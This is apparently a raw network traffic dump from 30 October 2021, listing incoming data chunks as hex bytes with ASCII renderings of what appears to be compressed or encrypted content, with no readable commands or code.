                                                                                                                                                                                      2021-10-30 11:52:26 UTC808INData Raw: 9c ec eb 39 02 bb 1b 21 fd f4 ed ea 18 c5 4c 67 ec 7a 8a f4 69 ac 7c 49 75 ae a2 ab 49 ff 2c 2e 66 39 b3 11 d2 16 47 d7 2f 76 75 e1 f3 41 e6 8c 6c f4 cc 81 51 6e b7 57 a8 6a 45 f6 81 2e 5f b8 7d 74 de 8a 51 ee a8 b6 8a 8d f2 59 f3 28 67 86 d7 66 9f 51 df 59 ee a8 76 44 57 57 dd 93 15 a3 79 47 5f 14 3b eb bd 2b fa 00 fd aa dc 23 3f 05 39 ca d1 9e 97 ac eb 7a ad ce 31 eb b9 fb 42 7a 64 8d 19 9f f9 21 ed 6a ad 9e 33 ab 77 46 31 a1 b8 ee c3 51 ff 8a 95 1c a8 72 b5 47 fc 19 c7 be f1 98 c7 3c a6 fd cb 04 42 b6 fb aa 07 7d 55 5f 8d 55 5e f7 c5 51 e9 23 5f 15 9b f5 1e d5 8a 2a af fa d2 58 d1 05 b6 46 d7 61 d4 9b 1a 8f 89 ce 76 bf 9f 83 a8 72 46 3e 47 be 2e 07 3d 47 31 f2 39 a3 b8 f6 91 be 73 fa c1 ac 4e b8 3d bb af c4 a5 f4 95 6b 27 d2 16 55 6e a7 83 fb 72 6e 18
                                                                                                                                                                                      Data Ascii: 9!Lgzi|IuI,.f9G/vuAlQnWjE._}tQY(gfQYvDWWyG_;+#?9z1Bzd!j3wF1QrG<B}U_U^Q#_*XFavrF>G.=G19sN=k'Unrn
                                                                                                                                                                                      2021-10-30 11:52:26 UTC809INData Raw: d8 28 07 e4 db d9 a7 e8 74 58 f1 ad f4 eb 6a aa 9c 2e 77 04 39 79 0f 55 b5 b3 fe 6e 77 ba 48 bb 62 74 3d d0 8f f4 15 55 de cc 37 ea 9d 6b 15 99 3f aa 17 5d 7c 56 37 e2 68 cf 2a 7e f4 8b e2 9c f5 df 0e ba 7d a4 bf cb 63 3f a3 f3 20 a6 dc 59 df dd 79 ba fc 11 f9 65 3c ea 71 34 d6 71 6e bf 2a 67 e4 f3 bd ae d6 0a f7 67 4e 57 b3 43 75 3d 47 f3 48 1f ed 05 7b f6 f9 ca 9e 15 ee bf f1 1e ef f1 1e e5 8b 5a e5 ab be ac 73 14 95 4f 54 39 c2 f5 6a 0e d8 ed d7 8d d0 cd b5 a3 bb 2f c9 9c 9d 2f b9 1c 45 a7 8b b4 ab b9 56 7a 65 1f ec ce 9f f3 38 55 df ae 8f 58 c9 11 6e 77 f3 67 8d 70 df ea 1c ab 35 47 63 49 55 37 ea 25 56 ee 63 31 b3 61 c7 ef 3e f4 d1 3d 91 64 cf d9 1c ce ae 5f 9c 33 9f b3 b3 c7 64 77 4e 8f 75 0f f5 4b b2 b2 ff 73 59 f9 72 82 4b ec b9 fa a9 cc ce 1a 66
                                                                                                                                                                                      Data Ascii: (tXj.w9yUnwHbt=U7k?]|V7h*~}c? Yye<q4qn*ggNWCu=GH{ZsOT9j//EVze8UXnwgp5GcIU7%Vc1a>=d_3dwNuKsYrKf
                                                                                                                                                                                      2021-10-30 11:52:26 UTC811INData Raw: 30 fa c9 95 b3 1a eb f2 46 f5 22 e3 ab 7d 76 3f 6f 2b 9f a3 a4 9a e3 f4 a2 76 ad 97 4d b9 19 72 04 b7 33 26 ba 38 3a 73 ca ce fa ae 56 74 31 f4 cc f7 bd 65 4c cc 7a 64 4d 17 cb bc 3c d3 2a 77 a5 d7 8a 0e a3 bd 62 8f 7a 54 3d 77 7d a3 7d 8b 91 bd 93 2b d2 16 ee cb b5 40 55 07 1e 43 af 7c ce aa 2f f1 9c 6e ad b0 3b 47 c6 dc 96 5e 3d a0 76 e6 e8 fc 33 72 1d 15 be 36 72 66 f3 ed ae 67 27 7f b7 b7 a3 bd 1c 5d bb fb bb 2f 14 58 99 47 74 7d 76 f7 38 5b cf 88 51 6d 15 4b 1f 6b dd 5d 43 97 2f 7f ee 7f 65 1d ce ea 5a 76 f3 b4 ae 95 9a 59 ce 28 9e b1 95 f9 78 a9 e8 72 57 fd 47 e6 5e a9 91 6f f5 3e e9 f6 32 ab 13 e4 54 9f 9f ca d7 e1 73 79 dd 8d 87 3c e4 21 e5 ff fa 5c f9 b2 17 2b ba c0 ae 72 ba 2f f5 51 8d e8 74 31 b2 67 f3 89 5d 5d cc ec a3 67 8a 9d 35 4e 55 3f 9a
                                                                                                                                                                                      Data Ascii: 0F"}v?o+vMr3&8:sVt1eLzdM<*wbzT=w}}+@UC|/n;G^=v3r6rfg']/XGt}v8[QmKk]C/eZvY(xrWG^o>2Tsy<!\+r/Qt1g]]g5NU?
                                                                                                                                                                                      2021-10-30 11:52:26 UTC812INData Raw: c7 1f 74 ab 35 bb f8 03 78 15 d5 90 7f a4 7e c6 ca be 3d a7 62 16 17 b9 87 11 ca f1 b5 ac d4 ac be 74 ad f4 82 2e 77 b5 c7 2c af 8a 1f ed 5d d5 cd 5e 0c 3a 76 63 ab 3e 27 e3 6e bb ee 7b e8 7a 56 fe 73 73 d3 b7 d2 6f b4 d6 ae 5e 8c 7a eb 73 40 7c f4 19 1a f5 17 a7 17 b5 93 52 7c c8 d3 37 b2 3b bd 7b c1 a8 74 f7 89 ca df e5 40 37 9f a8 fa e4 28 b2 4e a4 cf ed 9d 3d 3a 5d cf 95 1e f9 45 d8 e5 89 b4 01 7f 57 bb da a7 fa 52 ae 7a 43 37 c7 2c 57 74 f9 d5 1a c4 4a 4f 51 f9 a0 9b 53 74 75 ab 79 ce e8 de 85 ca bf d2 1b 46 b9 b3 3e 2b f3 1c ed af bd cf be ac 47 f7 d9 11 56 6b f3 21 3a ab ab 1e ba aa e9 1e c6 2b eb 18 3d c8 b3 7e f6 d0 77 76 72 3b f2 ba 71 9d 66 d7 f3 76 ad b3 cb 1d f5 98 f5 5f 99 7f 75 8d 99 97 e7 54 f5 e9 7a cb cf f5 5f ad 4b 5f d7 db 59 e9 53 5d
                                                                                                                                                                                      Data Ascii: t5x~=bt.w,]^:vc>'n{zVsso^zs@|R|7;{t@7(N=:]EWRzC7,WtJOQStuyF>+GVk!:+=~wvr;qfv_uTz_K_YS]
                                                                                                                                                                                      2021-10-30 11:52:26 UTC813INData Raw: 7d eb 8c d7 54 87 98 a3 c8 c9 3a db fd b3 17 8e ca 27 56 74 91 76 37 1f 54 3e 81 7f 36 42 da a2 9a 7b 54 e7 39 95 2e e8 e9 be 8e 9d 1c 1f 11 6c 71 e4 1c dd 27 1d 3b fd 49 e5 13 be 06 31 ab 1d cd b3 5a eb be 9c bf 62 a7 6f e6 ce 6c a1 0f bf fb 33 67 e5 8c 20 1f 38 0e 75 a3 b9 ce 65 d6 6f 65 be cc b9 c4 7a 47 e7 b2 c2 4a fd 68 6d 79 8d 3b ba 79 d2 ef 36 fa 91 73 eb e6 ab 18 f5 1f b1 33 c7 2c 97 b8 e7 55 be 64 b4 d6 ae 9e 2f eb 95 67 44 b2 72 de f9 32 50 31 3b e3 ae 36 fd b2 f1 a1 bb cd 0b 9b fb 9c b4 59 57 37 0a ce 8d 7d 0a ef 9f 73 cd 46 d6 28 72 5c 61 54 5b e9 d5 7c 89 ef d7 f5 19 37 de ea ad de 6a f8 67 d4 38 bc 6a 82 ca 97 8c ea 18 fd c6 ce 98 98 e9 5d 5c b8 5d 7d 80 32 df c9 be d8 39 3a e9 73 bb da a7 c8 7e ab 23 54 fb 72 32 3f f1 b8 74 17 f7 c1 ca 39
                                                                                                                                                                                      Data Ascii: }T:'Vtv7T>6B{T9.lq';I1Zbol3g 8ueoezGJhmy;y6s3,Ud/gDr2P1;6YW7}sF(r\aT[|7jg8j]\]}29:s~#Tr2?t9
                                                                                                                                                                                      2021-10-30 11:52:26 UTC815INData Raw: eb 15 e9 cf 7c 8d de d7 fd 29 f8 85 ef 19 5f 92 35 5d 9e df 08 89 6a 2a a9 d6 0c d8 39 0a cf 77 bf c8 eb 28 b2 76 46 e6 74 f5 d2 b1 dd df 9d 81 d0 fa bc c6 05 df 2a 9a 27 eb bc 3e e7 f2 d1 d7 28 5d a2 87 8e db 9e 23 bc 77 f6 1b e1 7d c8 cf 7b af ea d7 f5 ee fc b9 5e a7 9a c3 fb 54 f7 8d e8 6a ba b1 83 b5 f9 1a 3b 5f d5 cb 7d d2 47 b6 48 db e9 62 be 0e 91 76 85 ef c1 f3 b3 76 b4 1e 67 36 27 7d b2 5f d6 75 7d e4 57 ad c7 d1 dd c7 67 21 a9 fa a6 2f fb 55 35 40 ac 3b 9f d1 b9 e5 59 f8 e8 9f fd 44 73 fa fe aa f5 aa 16 1b bc 5f d7 5b 8c 62 39 97 c8 79 20 fd 55 de 68 8f 4e 65 e3 e3 2c fc a5 cb 9f 85 fa 5f 9c f8 88 cb d7 e5 77 68 ad b9 de d5 b3 ea fa 7a bd eb 59 eb 3d 58 f7 e9 cf a8 9d 3c 05 5d e3 84 a6 c2 75 a1 3a c4 6d 6e 4e 17 8f a7 2e aa 07 b4 e7 42 a5 af e6
                                                                                                                                                                                      Data Ascii: |)_5]j*9w(vFt*'>(]#w}{^Tj;_}GHbvvg6'}_u}Wg!/U5@;YDs_[b9y UhNe,_whzY=X<]u:mnN.B
                                                                                                                                                                                      2021-10-30 11:52:26 UTC816INData Raw: af cb 3e 6e 0b d7 85 f7 42 77 9f cf e9 d0 47 fd 3b fc 5c 54 ef 73 53 27 1f 82 cd e8 c2 3e d0 3b 58 27 b9 e8 aa 59 5d 2b e4 1a d1 7d 14 1e 4f fc dc f2 0c fd 4c b2 de 7b a2 a7 8d 9e 30 8f 46 04 1b bc ae ea 01 5e e3 ba d0 99 79 6f a4 3a cb 19 79 9f 31 0a e9 a3 35 0a e6 a6 ce d7 56 ad 87 98 e3 f5 1e af 72 fd fc 5d 77 b2 57 f6 a9 7a e8 45 ad f2 0b d7 45 de 9f b2 d1 3d b7 db 0b ba 9f 95 40 77 9f e8 fc e0 7e cd ef 76 57 e3 b0 e6 5c bf 48 5b b8 2f fb 63 57 6b c8 d1 ef 3d 09 e7 a1 31 5f d4 dc c7 cb 99 e7 d0 03 a9 a8 f6 22 94 af 1e e8 d4 8f 74 1f 7d fe 6a 2d de fb f4 a2 a6 85 c8 e8 a8 16 ea f9 e8 e9 f3 3a e9 88 e0 26 15 19 eb fc fe e0 c6 e7 78 dd ce e8 1f 20 e8 72 2b aa 98 7c 48 7e 40 d1 7d 84 b4 a1 f2 7b 8f fc d0 bb 80 f4 ea ba 01 b6 d7 24 19 c3 4e 3f bd 72 0e 47
                                                                                                                                                                                      Data Ascii: >nBwG;\TsS'>;X'Y]+}OL{0F^yo:y15Vr]wWzEE=@w~vW\H[/cWk=1_"t}j-:&x r+|H~@}{$N?rG
                                                                                                                                                                                      2021-10-30 11:52:26 UTC817INData Raw: 84 db d5 3c 15 9e 97 fd 84 7c 92 6a 3d 48 05 7b ce 75 8c d6 45 af 51 5f 87 5e 5e 07 ae fb 9c ae 2b 47 76 ce 45 8e 46 44 78 5e 9e 87 6c e1 3e fc 92 7c c9 95 08 7a 0b 7c 22 f3 12 5f 1b 3d 5c 07 ea b3 4f d7 77 95 ae af f0 f5 f8 58 a1 18 0f 6d 8d 88 6c 17 e6 e1 dc 19 fd 5c 89 0b 6c e1 ba f7 d4 3c 7c 49 b9 5f 22 b2 47 f6 61 ac f4 84 7a 09 6b a7 1f a3 a8 ea 3d ce fe 1c ad 5f f8 fc ec 49 64 4f 9f d7 a5 a2 5a 8f f0 1e d5 99 0b d9 a3 b9 73 44 1c af 97 5e 89 d0 7e f3 1c 24 9c 03 a3 8b e3 f3 56 eb 10 ee e3 1a 0a f2 b1 f3 fa ba 8d cf 91 4f eb 61 84 99 9e f9 b9 47 ce 84 7b 1c dd 5f d6 78 51 23 c7 75 f5 90 ce 1c de 1b a1 af db 1e c7 97 fe ec 07 ca 13 ee 73 fd c6 9b bf f9 9b ff 96 0e 94 c4 0a bf 21 39 70 46 e1 ba d3 e5 54 7a 37 87 db c2 75 e1 b9 62 d4 07 9d d1 fd 7e 53
                                                                                                                                                                                      Data Ascii: <|j=H{uEQ_^^+GvEFDx^l>|z|"_=\OwXml\l<|I_"Gazk=_IdOZsD^~$VOaG{_xQ#us!9pFTz7ub~S
                                                                                                                                                                                      2021-10-30 11:52:26 UTC819INData Raw: 08 5c 34 c7 73 2a dd c7 d4 f3 26 70 dc e7 75 90 3e 8d 12 ff 69 84 fb d1 a1 3a c8 11 5e eb fd aa 33 d1 45 14 a3 8b 26 54 4f 0f d7 dd 66 3f e4 3b 69 3b 1e ab f2 aa 9e 3e af f0 98 eb ce 68 6f 8c 2e 9c 17 36 ba a3 9e 7e 76 7e 9e 39 9f f7 e0 bf 1c 45 d7 1b 3a bf 60 1e 84 0f 36 02 e8 33 9f cf 55 e9 3e 22 a3 2f 67 46 ce 32 51 5c f3 e7 b9 b9 88 aa 5f f6 96 ed 42 4e f5 39 db 21 d7 c2 83 0f 9b 71 95 dd f9 a1 ab d3 fc ac 49 63 8a fb 59 ab f4 15 7c 4e 3f bf ea cc 39 6f 8d 7e 4f 90 c7 c8 1a 34 22 d8 40 3e f3 00 7e a8 6a 05 b6 cf eb 22 fc be c0 d7 e9 15 3e b7 eb 7e ce fe 79 9c e1 79 5d 7e ae cf 47 31 9b 87 7a 6a b8 46 d8 8c 22 d7 c3 be 10 ee 21 6c c1 7e 85 9f 83 46 9f c3 c5 d7 20 f1 9c 4a 17 a3 fb c2 73 73 5e b7 c1 d7 08 a9 53 e3 7e e1 9f a3 ec e3 e7 25 dd 45 3e 9d 95
                                                                                                                                                                                      Data Ascii: \4s*&pu>i:^3E&TOf?;i;>ho.6~v~9E:`63U>"/gF2Q\_BN9!qIcY|N?9o~O4"@>~j">~yy]~G1zjF"!l~F Jss^S~%E>
                                                                                                                                                                                      2021-10-30 11:52:26 UTC820INData Raw: ae 05 c8 d7 c1 3a 7c bf be e6 5c 27 73 a0 43 ce 59 9d 9f 43 3e d7 1b f1 eb 4f 4e d5 cb d7 28 aa 35 57 3e 91 7b f5 11 64 b3 8e 8c 41 fa c9 17 5e 0f 69 8f f0 5c d7 39 13 7c 1a 2b f1 17 2c 09 2f 57 8c bf f1 1b bf 71 ca 91 cd 8b 1a 35 3e a2 ab a7 f2 e8 ad 11 bf 46 74 d6 e4 a3 70 1d dc 77 f3 df fa ac e0 a0 35 ea e2 69 ec 04 5c 17 4c e6 7e 6e 84 cc c5 f6 11 79 93 37 79 93 ab e7 3f ff f9 57 9f f2 29 9f 72 33 9e 37 28 7e 27 7d d8 1a 25 9f fb b9 9f 7b f5 e4 27 3f f9 e4 fb 7f 9d ef fa ae ef ba fa fa af ff fa 93 ee e7 56 5d 43 c1 19 42 a5 7f db b7 7d db d5 07 7d d0 07 9d f4 11 e4 fb 98 f7 5c 85 d6 86 f0 61 60 bd 90 3d d1 25 1f f6 61 1f 76 f5 b2 97 bd ec ea 47 7e e4 47 6e fa 2b bc 07 63 ce 23 dc 97 f1 51 0c ba f9 1d e5 20 9c 51 8e 42 2f 54 cf 7d ee 73 4f fa 0a fa 8f
                                                                                                                                                                                      Data Ascii: :|\'sCYC>ON(5W>{dA^i\9|+,/Wq5>Ftpw5i\L~ny7y?W)r37(~'}%{'?V]CB}}\a`=%avG~Gn+c#Q QB/T}sO
                                                                                                                                                                                      2021-10-30 11:52:26 UTC821INData Raw: 4f 3c 8d 7e ff 54 f8 9c 08 eb e1 03 85 64 9e 4b 05 f7 e4 6c 0d fa b3 90 8f 79 cc 63 6e f6 c9 be 6e 57 7e f4 84 cf 93 44 6b 40 d2 87 cd 97 5d 7e a9 d1 0b dd 99 ad 61 84 fa f9 3d 90 e2 e7 be 43 d6 4b 64 b3 56 ef 87 9e 3e cf 43 f7 1e f4 94 f8 c3 d7 fd 88 fb d1 b3 e7 6c 44 64 23 ee df c1 eb 2a 71 f2 3e 70 5b c2 7d c1 88 8e e0 eb 62 dc 73 c4 f2 de 23 26 f1 f9 a9 43 c0 73 45 da 09 71 97 c4 cf 64 74 56 ba 26 50 f5 49 72 ce ec 2d f1 6b ad 91 fb 47 f7 5c 0a b9 5e 93 52 f9 81 58 e2 6b e4 7a 88 d9 38 bb 36 8e af 25 d7 50 d9 9e 2f dc f6 b8 4b 17 63 df 9c 2d e7 eb e7 ac 1c 62 d2 dd 56 9c 9f a6 4b bc ce fd fa 33 b9 ee f7 7a 8d f4 f4 fe 1a 59 23 ba 4b 82 2f c7 a4 f3 c3 9d fe d7 27 22 aa d1 45 f8 85 4f aa d8 28 df 61 e1 1f f9 91 1f 79 f3 a7 69 f0 ae ef fa ae 57 ef fe ee
                                                                                                                                                                                      Data Ascii: O<~TdKlycnnW~Dk@]~a=CKdV>ClDd#*q>p[}bs#&CsEqdtV&PIr-kG\^RXkz86%P/Kc-bVK3zY#K/'"EO(ayiW
                                                                                                                                                                                      2021-10-30 11:52:26 UTC823INData Raw: e4 ba 25 ec 07 dc 2f 5c 9f 71 37 26 11 d5 c8 01 67 0c 7f 77 21 81 8b 59 5d a8 ca 27 e4 d7 9f 11 7a bd d7 7b bd 6b 4f cd 03 1e f0 80 9b 3f 55 03 ad 8f 35 3a dd a1 fe 36 af 81 33 e1 9c f0 e5 f5 ab ae b9 e2 1f f5 51 1f 75 6d 8d d1 df 00 a5 67 f5 30 41 c0 f5 24 73 1d ae 2f 7b 71 d8 eb 0e 4f 7d ea 53 4f bf 40 f6 cd de ec cd 6e d6 a7 08 74 ee b5 6a e4 43 9f 52 c5 e4 e3 61 c1 43 44 23 0f 16 09 f1 94 5d aa 1e 9a df e5 08 5c 27 bf 56 d5 b5 ab f2 74 66 3b 90 af 31 75 97 ce 8f 68 af e8 79 4d 74 2e 3e e6 19 b9 64 4f 9f 17 3c c7 05 a8 03 62 79 7e 23 a8 f1 fe 2e be 66 df 27 a2 fb ad f2 e3 ab 64 16 47 7c ce 91 cf bf 44 f9 0c b8 cf fd e8 aa 23 e6 3a 36 3e 74 17 ad 81 b3 f1 33 ea ce 0d 11 5c 1b e5 00 7a 75 dd b8 ef 25 7a 2e 4a aa 17 32 fc 9e 87 e0 a3 0f 60 af 48 52 e5 20
                                                                                                                                                                                      Data Ascii: %/\q7&gw!Y]'z{kO?U5:63Qumg0A$s/{qO}SO@ntjCRaCD#]\'Vtf;1uhyMt.>dO<by~#.f'dG|D#:6>t3\zu%z.J2`HR
                                                                                                                                                                                      2021-10-30 11:52:26 UTC824INData Raw: 7a 3f d7 b9 a1 f5 37 39 8f a0 7f 03 94 39 5c 44 e7 63 cc 18 64 4c c2 9a 25 82 7d 48 ce 45 7f 1b f4 8b bf f8 8b af 1e f8 c0 07 de bc 06 de 1f 1f ff 5b 46 c2 ff ca e1 cf 97 55 42 8e 8b fa 54 ff 4b 48 63 35 b7 64 07 dd ab d4 55 bd 24 7e 8e ab f8 e7 01 e8 23 61 ed be 57 09 6b 20 8e b8 cf fb 08 e6 92 e8 4b 0e 71 bf e7 01 f5 90 71 d7 9d 9c df ed 4a c8 49 32 9e c2 d9 fb be f3 9a b8 2f cf 29 c5 cf d9 ef 29 b7 b9 af f0 67 2d ba fb d1 25 5d 0f d7 b1 c9 27 46 2d 36 c2 fe 72 9f 23 e1 5c fc 9c 3a 99 e5 25 ee 53 ad e0 5e 51 ac ba 6f aa 3e 15 dd 8b 9f c0 c6 e7 23 ba c8 b8 93 35 3b 42 1d a4 8f 3c cf 49 3c e6 b9 7c 5e fd 73 2b 5d 3f 3c 70 c1 c7 df 86 d5 28 d1 fb c3 dd ef 7e f7 5b 74 89 74 17 f2 11 ef e9 73 57 e4 35 74 bb bb be a3 eb ce bd 5a 89 38 dd 09 a3 06 c4 32 c7 fd
                                                                                                                                                                                      Data Ascii: z?799\DcdL%}HE[FUBTKHc5dU$~#aWk KqqJI2/))g-%]'F-6r#\:%S^Qo>#5;B<I<|^s+]?<p(~[ttsW5tZ82
                                                                                                                                                                                      2021-10-30 11:52:26 UTC825INData Raw: 0b cf a9 44 f0 99 df a5 5a d3 2e e5 cc 55 e3 f4 75 f6 c8 8f 08 0e 5c f2 36 6f f3 36 67 ff 34 0d f4 8b 72 75 b0 3e 5f 8a cf ed c2 0d 51 c5 24 5d ad fc d4 ba 28 86 ae 2f 23 d9 bb 78 3f c4 e7 76 9f 7f e1 79 0e e2 31 3f 0f f6 55 c5 dc 8f c8 d6 17 58 fe b2 e1 a3 bc cf fb bc cf d5 3d ef 79 cf 9b fd 7d 7e 5f 47 8a af cb d7 8e 0f e1 e5 40 39 08 3e e5 df 2e f4 22 ab ff 15 aa 35 54 73 63 e7 7a 91 0e 7f 70 a4 e4 8f ee 77 a9 ce 9c 35 b2 de dd 33 53 ad f6 eb 3f 45 f4 bd bb 2e f1 35 20 e0 ba e0 41 ca fe d9 7b e5 c3 76 49 7f 97 eb 7e 9f d3 47 97 0e d6 ef 7b 73 61 ff 7e 36 19 f7 33 ca f3 22 9e d2 e5 27 95 6f b6 9f 4e 3c 9e ba 53 f9 80 f5 0b f2 7c 3d f4 74 49 46 eb 07 72 32 37 fb e5 3c 9e af fb a0 8b 89 51 0c e4 27 4f e2 fb 17 1e 73 49 dc ef 63 fa 8f 8a df 47 ac d1 e3 2e
                                                                                                                                                                                      Data Ascii: DZ.Uu\6o6g4ru>_Q$](/#x?vy1?UX=y}~_G@9>."5Tsczpw53S?E.5 A{vI~G{sa~63"'oN<S|=tIFr27<Q'OsIcG.
                                                                                                                                                                                      2021-10-30 11:52:26 UTC827INData Raw: 57 42 0e d7 af 3a 77 c7 73 32 3f f5 cc 43 78 5e fa 7d 95 39 2e c4 c9 f5 5a 3d 73 25 f4 94 ae 17 a3 94 7c 31 c3 ae 5e c2 fc 65 4c ba 8b e7 53 ef fd 34 fa 0b 9b e6 f6 b5 f9 da 73 9f 9c 95 e3 b1 0a f5 39 c2 e9 4e e8 16 92 42 5e 0a 1b 73 e1 82 78 3c eb 6e c7 4f d3 40 3f 55 d3 3f 2b e5 f3 b2 0e 5f 4f fa 52 a8 dd 95 ee fc 76 a1 4e 6b c9 7e 95 08 d6 80 de a1 7c 72 d1 b3 17 e0 bb f4 9f 4d 4b f4 97 41 58 53 4a b5 36 f7 a5 78 6d 75 4d 95 f3 da e0 11 8f 78 c4 d5 df fc 9b 7f f3 f4 6f 66 ea 0b 81 97 10 3d 98 f3 4b 02 21 0f 5d a3 1e da e4 4b 27 37 1f fa 3b 64 1f f4 73 fb 02 3d e9 85 f8 3c 08 7b e3 05 ac 12 cf 93 ee bd 72 0e e6 47 07 8f f9 98 f7 87 df 57 80 2f 63 d2 2b d2 df e5 09 7a ba a4 df 6d 40 d7 19 8c f0 73 90 9e 76 e2 73 24 e4 d3 27 eb dd ef d7 8b 35 7a 9c 6b e7
                                                                                                                                                                                      Data Ascii: WB:ws2?Cx^}9.Z=s%|1^eLS4s9NB^sx<nO@?U?+_ORvNk~|rMKAXSJ6xmuMxof=K!]K'7;ds=<{rGW/c+zm@svs$'5zk
                                                                                                                                                                                      2021-10-30 11:52:26 UTC828INData Raw: ee ef a3 70 ce cc 85 ce 9a 76 a0 2e c5 fb 21 15 d5 be 34 e6 73 88 cf 35 e2 7e 9e 51 b2 19 53 c8 f1 dc 4a 72 1e 5f 57 27 30 da a7 9f 83 e7 55 3e d1 c5 75 a6 ee 47 67 ec a4 bb 16 ee 93 90 c7 f3 85 97 10 fc d4 c8 76 91 cf a5 f2 e1 f7 1a 8d 9a 23 e7 e9 24 6b 3b 3b c5 7b 48 d8 1f e2 6b a8 e4 12 ac f4 ea e2 7e 9f ad 52 d5 8c fa e4 fd 0c 2b 73 b3 37 97 bc a6 79 e6 fa 0f 57 8f a7 2e a9 f0 75 6a ec 3e 9f dd e7 b7 a2 f3 0b d5 4b 66 8c e6 e8 fc e2 e6 8b 5a 3e 9c e4 43 97 9f 3c 7c f8 47 0f b4 4a f4 67 90 24 bb fc d9 3f fb 67 af 7e e9 97 7e e9 d0 ff 76 d2 df 00 d5 0b 9b 0e 41 7b e0 40 5c c0 f5 15 fc 86 41 fc 46 43 f0 ef c2 c3 21 fb 21 3e 27 7a 4a c6 84 7c 02 7b 84 fe 69 ae 23 3f 4d fb aa af fa aa d3 79 be e0 05 2f b8 f6 ac a3 9f ba ea f7 8f ad b0 72 cd ba 7d ae ec 3f
                                                                                                                                                                                      Data Ascii: pv.!4s5~QSJr_W'0U>uGgv#$k;;{Hk~R+s7yW.uj>KfZ>C<|GJg$?g~~vA{@\AFC!!>'zJ|{i#?My/r}?
                                                                                                                                                                                      2021-10-30 11:52:26 UTC829INData Raw: 87 68 e6 21 39 a1 f7 fc 93 7f f2 4f 5e 4f bb ce f7 7c cf f7 5c fd f8 8f ff f8 2d 73 7c ed d7 7e ed f6 17 a2 7e aa a6 3f 00 ee 17 05 dd 2f 18 c2 cd 83 ee a3 84 ba 8a f4 ab ee 5c 74 8e c0 b9 82 eb 49 b5 46 ce 11 e8 27 f1 73 96 fd 89 9f f8 89 d7 59 7b fc 95 bf f2 57 ae b5 57 f3 e2 17 bf f8 ea 95 af 7c e5 b5 b5 ce 47 7d d4 47 9d c6 ee dc d3 e7 a3 84 6b a6 0f 27 1f 76 f9 f8 b0 6a dc 45 75 2e f4 d7 4b 81 fe 3c e4 3f f8 07 ff e0 3a f3 7c 9e f3 9c e7 9c fe f7 aa 5f 97 4a f4 b9 ac f4 5d f8 8c 53 cf 7d 71 2e de 07 9d 39 5c 7c 7e f4 ca 96 f8 33 a9 b2 25 d9 13 1b 7d 26 ac d5 25 e1 5e db 15 ee 1d d7 75 1f 21 7e 8f 49 3c 86 74 7d dc 87 ed b1 aa c7 4c ba 5e 3e 66 4e fa 89 f9 88 de f9 d3 97 e2 31 21 1b f1 3c e1 f6 51 b9 04 a3 fb aa f3 73 4f 8a 8c a7 5d e5 56 f7 bd 7c 5e
                                                                                                                                                                                      Data Ascii: h!9O^O|\-s|~~?/\tIF'sY{WW|G}Gk'vjEu.K<?:|_J]S}q.9\|~3%}&%^u!~I<t}L^>fN1!<QsO]V|^
                                                                                                                                                                                      2021-10-30 11:52:26 UTC830INData Raw: 74 ae f9 10 e7 ac bf ff fb bf ff ea 3f ff e7 ff 7c d2 77 d0 0b 8f af b5 5a 3b 73 24 3e 3f eb f2 f5 ed 90 f3 62 e7 35 90 70 bd 3e fb b3 3f fb ea 45 2f 7a d1 75 c5 f9 7c f8 87 7f f8 e9 7f 85 f2 d2 e3 f7 44 ca 2e aa 61 fd 88 ef 49 b2 4b d6 a7 70 86 48 17 1b 51 c5 f3 da 72 bd f1 bb bd 22 d4 30 fa bd 24 71 e4 cf 2f 01 cf 45 66 fe 2a 2e 5b bd fd 8b 27 73 c8 c3 af 91 75 b9 af b3 f1 21 19 93 78 bf 14 a8 7c 50 e5 42 e6 67 6e a2 35 3a 7e 3f f8 3d b4 eb 4f 1b 9f 70 9f df b3 12 7d 8e 46 71 89 c7 3d a7 b2 2b dd 3f e7 59 53 09 b9 ee 9b 3d 3f 66 3d 25 ca f3 11 c9 5a e6 91 4e 6f 5f 77 e6 fb 19 3b 7e 2f 70 6f f2 79 90 cd c8 0b 9a 74 fc ca c5 ce fb 29 e7 11 ee ab d6 b2 e2 c3 4e 3f cc e2 e2 96 bb 9b 03 40 92 51 3c 63 c8 d3 9f fe f4 43 3f 4d d3 3f ab 33 43 17 fb e8 4f d5 ee
                                                                                                                                                                                      Data Ascii: t?|wZ;s$>?b5p>?E/zu|D.aIKpHQr"0$q/Ef*.['su!x|PBgn5:~?=Op}Fq=+?YS=?f=%ZNo_w;~/poyt)N?@Q<cC?M?3CO
                                                                                                                                                                                      2021-10-30 11:52:26 UTC832INData Raw: b5 f4 94 b8 cf 63 ee 4b 5d 42 ef 23 c2 1c 29 8a e5 39 4a 14 d3 58 c5 46 92 d7 85 79 d2 1e f5 25 df eb b0 d9 8b fb 89 a1 b3 06 24 ef 21 6c 48 9f e7 41 fa 52 77 71 32 86 74 0c 5f d4 56 1a 88 8c cb d6 1f fe be ff fd ef 7f ed 59 43 5f 6a fa 5b 6d 39 af 1f 74 8e 12 5d a4 23 2f 85 fa 4d f2 fa 33 3e 7e 31 ab 9b a0 13 cf 5b 95 5d d8 63 ee 19 dd 7d 2e d0 cd e9 39 42 f6 23 1f f9 c8 d3 bf 1e b1 8b fe cc 19 5f 04 f9 50 af e6 97 4f f2 c2 17 be f0 da b3 8e fe 6c 96 7e 5b 3f 0f 1a 89 bf 08 ad 8a ee 35 d5 76 e7 d3 a1 73 a2 87 cf ed ba df 23 f8 ab 75 fe 9d bf f3 77 4e 7f 16 f0 a5 2f 7d e9 75 f7 f3 d0 bf bc a1 3f b7 f6 b8 c7 3d 6e 7b 5f c0 fd 83 a8 8f 8f c8 2e dc 17 39 0a ee 9b 14 5e a6 aa 11 dd 85 5e 8c 23 81 99 2d 72 3e 91 a3 f0 b8 f0 1c f7 8b b4 1d e6 82 aa de c9 dc 64
                                                                                                                                                                                      Data Ascii: cK]B#)9JXFy%$!lHARwq2t_VYC_j[m9t]#/M3>~1[]c}.9B#_POl~[?5vs#uwN/}u?=n{_.9^^#-r>d
